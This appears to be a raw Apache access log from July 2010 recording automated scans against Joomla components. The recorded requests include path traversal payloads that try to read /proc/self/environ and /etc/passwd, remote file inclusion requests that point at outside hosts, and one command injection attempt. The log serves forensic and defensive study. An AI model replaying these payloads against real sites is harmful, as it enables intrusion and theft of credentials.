72.37.150.18 - - [27/Jul/2010:17:27:32 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:27:32 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
76.242.100.234 - - [27/Jul/2010:17:29:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.121.240.147 - - [27/Jul/2010:17:31:12 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:17:31:12 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:17:31:12 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:17:31:33 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:17:31:33 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:17:31:34 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:17:31:54 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:32:04 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
92.43.201.28 - - [27/Jul/2010:17:35:53 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:35:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:35:54 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:17:36:18 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:36:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:36:18 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
92.43.201.28 - - [27/Jul/2010:17:38:09 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:38:09 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:38:10 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
119.192.145.144 - - [27/Jul/2010:17:38:11 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:38:11 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:38:12 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:38:26 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:38:26 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:38:26 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:17:39:34 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:39:35 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:39:35 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:39:44 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:39:44 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:39:44 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.98.217.83 - - [27/Jul/2010:17:39:58 +0200] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:39:58 +0200] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.83.64.16 - - [27/Jul/2010:17:42:19 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:42:19 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:42:23 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:42:23 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:42:25 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:42:25 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:43:44 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:43:44 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:43:44 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:44:06 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:44:07 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:44:10 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:45:34 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:45:36 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:45:36 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:12 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:12 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:12 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:34 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:34 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:46:34 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:37 +0200] "GET /logs/access_log/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:38 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:38 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:39 +0200] "GET /logs/access_log/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:39 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:39 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:46 +0200] "GET /logs/access_log/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:46 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:46:47 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
202.47.80.12 - - [27/Jul/2010:17:48:40 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 366 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:17:48:46 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 361 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:17:49:08 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 366 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:17:49:13 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 361 "-" "libwww-perl/5.805"
91.83.64.16 - - [27/Jul/2010:17:54:35 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:54:36 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:54:36 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:24 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:25 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:25 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:32 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:33 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
91.83.64.16 - - [27/Jul/2010:17:55:33 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
217.16.18.219 - - [27/Jul/2010:17:58:51 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
85.93.128.40 - - [27/Jul/2010:18:10:16 +0200] "GET ///?INCLUDE_FOLDER=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
85.93.128.40 - - [27/Jul/2010:18:10:16 +0200] "GET /logs///?INCLUDE_FOLDER=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
194.149.14.77 - - [27/Jul/2010:18:11:19 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:18:11:26 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
194.149.14.77 - - [27/Jul/2010:18:12:05 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:18:12:36 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
85.93.128.40 - - [27/Jul/2010:18:13:06 +0200] "GET ///?INCLUDE_FOLDER=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
85.93.128.40 - - [27/Jul/2010:18:13:06 +0200] "GET /logs///?INCLUDE_FOLDER=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
188.127.248.175 - - [27/Jul/2010:18:13:12 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
194.149.14.77 - - [27/Jul/2010:18:13:13 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:18:13:16 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:13:23 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:13:23 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:13:23 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
194.149.14.77 - - [27/Jul/2010:18:15:29 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:15:34 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:15:42 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:15:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:15:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:16:04 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:16:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:16:05 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:18:16:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:18:17:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:18:18:10 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:10 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:11 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:26 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:26 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:26 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:46 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:47 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:18:47 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
92.43.201.28 - - [27/Jul/2010:18:19:56 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:18:19:56 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:18:20:35 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:18:20:36 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
194.149.14.77 - - [27/Jul/2010:18:27:19 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:27:19 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:27:19 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:27:53 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:27:53 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:18:27:54 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:18:28:44 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
188.165.217.175 - - [27/Jul/2010:18:29:38 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:18:29:38 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
157.181.180.23 - - [27/Jul/2010:18:30:22 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
157.181.180.23 - - [27/Jul/2010:18:36:40 +0200] "GET /logs/access_log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
157.181.180.23 - - [27/Jul/2010:18:36:40 +0200] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
157.181.180.23 - - [27/Jul/2010:18:36:41 +0200] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:37:08 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:37:12 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:39:24 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:39:24 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:39:38 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:39:39 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:42:07 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:42:08 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:18:42:08 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
